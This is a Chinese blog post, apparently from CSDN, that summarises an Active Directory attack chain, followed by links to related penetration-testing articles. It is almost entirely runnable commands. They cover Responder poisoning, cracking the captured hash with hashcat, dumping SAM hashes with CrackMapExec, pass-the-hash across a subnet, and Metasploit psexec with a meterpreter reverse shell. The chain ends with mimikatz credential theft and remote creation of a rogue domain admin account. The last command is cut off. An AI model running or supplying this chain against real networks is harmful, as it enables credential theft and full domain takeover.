Responder探测内网获取域控权限总结

最新推荐文章于 2024-07-06 09:00:03 发布
最新推荐文章于 2024-07-06 09:00:03 发布
阅读量854 收藏 4
点赞数
文章标签: python shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34117522/article/details/85191093
版权

Responder探测内网获取域控权限总结

(1)执行Responder探测内网(https://github.com/lgandx/Responder)

./Responder.py -I eth0 -rPv

(2)获取172.16.157.133的Responder值

(3)使用Crack Map Exec检查此主机的NetBIOS信息

cme smb 172.16.157.133

(4)使用hashcat对Responder值进行破解

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

获取密码值Winter2018!

(5)CME扫描

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

(6)获取本地的管理员帐户对本地密码散列进行dump

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

(7)获取FRONTDESK密码的NTLM哈希值

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

(8)哈希传递方式查看本地网络的smb权限情况

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-


auth

(9)可以登录172.16.157.134服务器

(10)对172.16.157.134进行查看,该计算机具备域控权限

cme smb 172.16.157.134

(11)msf下面利用smb口令进行shell获取

use exploit/windows/smb/psexec

set smbpass=aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51

set smbuser administrator

set playload windows/x64/meterpreter/reverse_tcp

run

getuid

(12)使用mimikatz获取域控密码

load mimikatz

kerberos

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda


weixin_34117522
关注
内网渗透-域内的权限维持
lza20001103的博客
10-01 1036
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持,权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1880
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
获取域控权限的方法
2301_76786857的博客
01-18 1187
对于入侵者来说,进入企业后,为了获取最大权限,通常会将目标瞄准在域控上。下面是针对不同的域控环境,列举的几种不同的攻击攻击手法。
域控安全 ----> Ntds.dit文件抓取
最新发布
Innocence_0的博客
07-06 350
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
获取域控的方法
2301_76786857的博客
01-19 1507
在域渗透中、作为渗透测试人员,获取域控权限基本上可以获取整个内网权限
红队日记 | 如何利用 AD CS 证书误配获取域控权限
瓦罗兰特顶级C位的博客
05-24 182
红队日记 | 如何利用 AD CS 证书误配获取域控权限
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1274
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
红蓝对抗之Windows内网渗透
Tencent_SRC的博客
06-29 6284
无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑、外网服务、职场WiFi等方式进...
网安工具 | Windows便携式渗透测试环境PentestBox入门到进阶使用指南
WeiyiGeek 唯一极客IT知识分享
09-26 437
描述: PentestBox是一个基于Windows的便携式渗透测试环境, 它基于ConEmu 和 cmder进行设计的。它包含了许多常用的渗透测试工具和应用程序,如等。PentestBox的设计初衷是为了方便渗透测试人员在Windows系统上进行测试,无需进行复杂的安装和配置。它可以直接从USB驱动器或其他便携设备上运行,而不会对主机系统产生任何影响, PentestBox还提供了图形用户界面,使得渗透测试工作更加简单和直观。
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4500
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
gzip: unknown suffix -- ignored
热门推荐
wenlifu71022的专栏
01-22 4万+
gzip: unknown suffix -- ignoredgunzip file#识别后缀,必须把后缀改为.gz //解压后的文件名,去掉.gzgunzip -c > urfile.txt http://203.208.39.132/search?q=cache:HyCcI10LgeYJ:ekyskill.blogspot.com/2009/04/gzip-unknown-
tar时出现“目录校验和错误”
nemo2011的专栏
12-28 8726
今天再hp-ux上安装truss时,到官方网站上下载了一个安装包。 结果tar -xvf filename。 居然出现了目录校验和错误. 这个错误。 上网查资料。 也没找出答案。  最后解决的办法是: file  filename.   查看这个文件的类型是什么。看到了这个包是由gzip压缩的。只是它的名字是以tar结尾。  然后又用gzip -dv finame解压缩。  结
Kali字典正确使用姿势
zegeai的博客
01-24 8862
0x01 Wordlists 终端输入wordlists,可以查看自带字典。ls -al 查看具体路径 /usr/share/wordlists/目录下带了rockyou的字典。2009年一家名叫rockyou的公司遭到了黑客攻击,他们的密码列表以明文存储,黑客下载了所有的密码列表并且公开。rockyou.txt包含14341564个唯一密码,用于32603388个帐户。 rockyou.txt被压缩,需要解压才能够使用 gzip -d /usr/share/wordlists/rockyou.txt
john破解shadow root密文登录提权
mingyqf的博客
02-17 1057
1.进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:gzip -d rockyou.txt.gz
Kali自带密码字典rockyou.txt解压
weixin_44802617的博客
09-13 1万+
近期使用了airmon-ng进行wifi密码破解,虽然抓到了包,但是由于kali自带wifite.txt太弱,未能匹配出密码,因此我使用了rockyou.txt。起初rockyou.txt是未解压的状态,名称为rockyou.txt.gz,位于/usr/share/wordlists文件夹中。此处只说明其解压方法,有效性另说。一般来说破译需要针对性的字典,而不是数据量庞大的字典,毕竟计算机计算能力是有限的。另外,如果想建立自己专属的密码字典,可以尝试使用crunch工具。
Windows系统密码抓取与防护
qq_43590351的博客
09-10 1597
Windows系统密码抓取与防护 单机密码抓取与防范 LM Hash 和NTLM Hash LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用 NTLM Hash(MD4加密) 真正是用户密码的哈希值 Windows操作系统中的密码一般由两部分组成: 一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下: Username:RID:LM-Ha
metasploit进阶
mingyqf的博客
02-28 878
内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost 10.10.10.136 set lport 4444 exploit
STARTING POINT TIER 1 Responder
qq_40710190的博客
05-15 584
STARTING POINT TIER 1 Responder 这一关学到了很多,首先nmap扫一下 └─$ sudo nmap -sV -sS 10.129.140.169 -p 1-10000 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) 5985/tcp open http Microsoft HTTPA
Responder攻防揭秘:内网欺骗利器与Windows协议解析
内网渗透之Responder攻防(上)深入解析 在内网渗透领域,Responder是一款备受关注的工具,特别是在对抗与防御策略中扮演着重要角色。Responder是一款专门用于欺骗和嗅探的软件,它主要利用Windows系统内置的三种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值